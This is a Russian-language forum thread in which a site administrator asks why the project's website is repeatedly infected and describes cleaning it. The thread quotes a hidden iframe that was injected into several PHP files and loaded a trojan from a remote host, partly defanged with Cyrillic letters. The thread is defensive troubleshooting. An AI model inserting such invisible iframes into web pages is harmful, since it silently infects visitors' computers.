Я - пользователь Denix. Пожалуйста перейдите по этой ссылке, если вы скачали текущую или одну из предыдущих версий Denix. Это просто счетчик для подстчета количества пользователей.
Зарегистрирован: 25.01.2009 Сообщения: 482 Откуда: С-Петербург, Россия
У нашего научно-образовательного проекта есть сайт. Примерно раз в полгода на нем заводится какой-нибудь вирус или троян. Как они туда попадают и что надо делать, чтобы избежать этого?
Зарегистрирован: 25.01.2009 Сообщения: 482 Откуда: С-Петербург, Россия
На них установлен лицензионный "Касперский", который всё время обновляется. Пароли нигде никогда не сохраняем. Каждый раз вводим. По почте не пересылаем.
1. Обратиться к разработчику сайта.
2. Посмотреть информацию внизу страницы сайта (и увидеть там, например, "Powered by PunBB" или "Сайт работает на UMI.CMS") )))
3. Посмотреть исходный текст странички.
4. Или вот так: http://www.xakep.ru/magazine/xa/104/052/2.asp ))) _________________
Зарегистрирован: 25.01.2009 Сообщения: 482 Откуда: С-Петербург, Россия
Обращаться к разработчику сайта не хочется, а так, несмотря на попытки использовать ваши советы, установить ничего не удаётся, хотя я имею полный доступ по ftp и в системы администрирования, которых 2 штуки.
А как Вы определяете что на сайте вирусы?
У Вас сервер не локальный предполагаю, раз есть доступ по фтп. Хотя возможно и для локального.
Обычно сервер на юникс системах, а там виндовс вирусы лежат как на блюдечке.
Зарегистрирован: 25.01.2009 Сообщения: 482 Откуда: С-Петербург, Россия
Представьте, нашему руководителю проекта постоянно не везёт. Он который раз первым натыкается на эти вирусы. В результате, его компьютер оказывается заражённым и он несколько дней потом чистит его от вируса.
Выглядело это в последний раз так. После его сообщения я попробовал зайти на сайт и антивирус предупредил меня о трояне Exploit.JS.Pdfka.ti. Я зашел по FTP и обнаружил, что 4 файла *.php имеют сегодняшнюю дату создания, в отличие от остальных, датированных 2008 годом. В этих файлах я обнаружил добавленную строку:
<iframe src="http://kораеvа.sеrvеgаmе.соm:8О8О/ts/in.cgi?ореn6" width=821 height=0 style="visibility: hidden"></iframe>, которая, как я понял и является ссылкой на троян. Удалил эти строки, вроде всё нормализовалось. Только непонятно, как они туда попали?
Денис, не волнуйся, прежде чем поместить на твой сайт эту строку, я сделал так, что ссылка работать не будет, заменив латинские буквы на русские.
а так, несмотря на попытки использовать ваши советы, установить ничего не удаётся, хотя я имею полный доступ по ftp и в системы администрирования, которых 2 штуки
А подробности узнать можно? Ну, конкретный действия и чем они закончились? А то остается только догадываться.
В принципе, не исключено что CMS самописная. Но все же, полагаю, что была взята бесплатно распространяемая CMS и была модифицирована.
Вы не можете начинать темы Вы не можете отвечать на сообщения Вы не можете редактировать свои сообщения Вы не можете удалять свои сообщения Вы не можете голосовать в опросах
Темы
Альбом
Регистрация
Профиль
Войти и проверить личные сообщения
Вход
